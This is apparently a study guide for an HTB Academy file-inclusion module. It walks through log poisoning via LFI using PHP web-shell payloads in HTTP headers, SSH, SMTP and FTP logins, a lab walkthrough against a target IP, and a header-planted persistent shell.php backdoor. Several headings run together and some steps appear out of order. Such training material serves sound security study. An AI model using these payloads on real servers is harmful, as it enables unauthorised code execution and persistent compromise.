Log poisoning combines LFI with log file contamination to achieve remote code execution by injecting malicious code into log files that can later be included and executed.
Prerequisites:
- LFI vulnerability allowing access to log files
- Ability to control logged data (User-Agent, HTTP headers, SSH attempts, etc.)
- Web server with write permissions to log files
Step 1: Identify Session File Location
# Common PHP session locations
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
# Get PHPSESSID from cookies
curl -I http://target.com/ | grep -i set-cookieStep 2: Poison Session Data
# Include poisoned session via LFI
http://target.com/lfi.php?file=../../../../var/lib/php/sessions/sess_SESSIONID
# Inject PHP code into session
http://target.com/lfi.php?language=<?php system($_GET["cmd"]); ?>Step 3: Execute Commands
# Access session file with command parameter
http://target.com/lfi.php?file=../../../../var/lib/php/sessions/sess_SESSIONID&cmd=idStep 1: Identify Log Location
# Apache logs
/var/log/apache2/access.log
/var/log/httpd/access_log
# Nginx logs
/var/log/nginx/access.logStep 2: Poison User-Agent Header
# Via curl
curl -s "http://target.com/" -H "User-Agent: <?php system(\$_GET['cmd']); ?>"
# Via Burp Suite
# Intercept request and modify User-Agent header
User-Agent: <?php system($_GET['cmd']); ?>Step 3: Execute via Log Inclusion
# Include poisoned access log
http://target.com/lfi.php?file=../../../../var/log/apache2/access.log&cmd=whoamiStep 1: Identify SSH Log Location
/var/log/auth.log # Debian/Ubuntu
/var/log/secure # CentOS/RHELStep 2: Poison SSH Login Attempts
# Inject PHP code in username
ssh '<?php system($_GET["cmd"]); ?>'@target.com
# Multiple attempts for reliable poisoning
for i in {1..5}; do
ssh '<?php system($_GET["cmd"]); ?>'@target.com
doneStep 3: Execute via Log Inclusion
http://target.com/lfi.php?file=../../../../var/log/auth.log&cmd=idCommon Mail Logs:
/var/log/mail.log
/var/log/mail.err
/var/mail/www-dataPoisoning Technique:
# Send email with PHP payload in sender field
telnet target.com 25
MAIL FROM: <?php system($_GET["cmd"]); ?>Log Locations:
/var/log/vsftpd.log
/var/log/ftp.logPoisoning via FTP Login:
ftp target.com
# Username: <?php system($_GET["cmd"]); ?>Objective: Achieve RCE via log poisoning and read flag
Step 1: Identify Vulnerable Parameter
http://83.136.254.199:58743/index.php?language=enStep 2: Test LFI
http://83.136.254.199:58743/index.php?language=../../../../etc/passwdStep 3: Identify Session Location
# Check for PHP sessions
http://83.136.254.199:58743/index.php?language=../../../../var/lib/php/sessions/sess_SESSIONIDStep 4: Poison Session
# Inject PHP code via language parameter
http://83.136.254.199:58743/index.php?language=<?php system($_GET["cmd"]); ?>Step 5: Execute Commands
# Include session with command execution
http://83.136.254.199:58743/index.php?language=../../../../var/lib/php/sessions/sess_SESSIONID&cmd=find / -name "*flag*" 2>/dev/null# Poison multiple HTTP headers
curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" \
-H "X-Forwarded-For: <?php system(\$_GET['cmd2']); ?>" \
-H "Referer: <?php system(\$_GET['cmd3']); ?>" \
http://target.com/# Create persistent backdoor in logs
curl -H "User-Agent: <?php file_put_contents('shell.php', '<?php system(\$_GET[\"cmd\"]); ?>'); ?>" \
http://target.com/[Content continues with troubleshooting and additional techniques...]
This guide covers advanced log poisoning techniques from HTB Academy's File Inclusion module.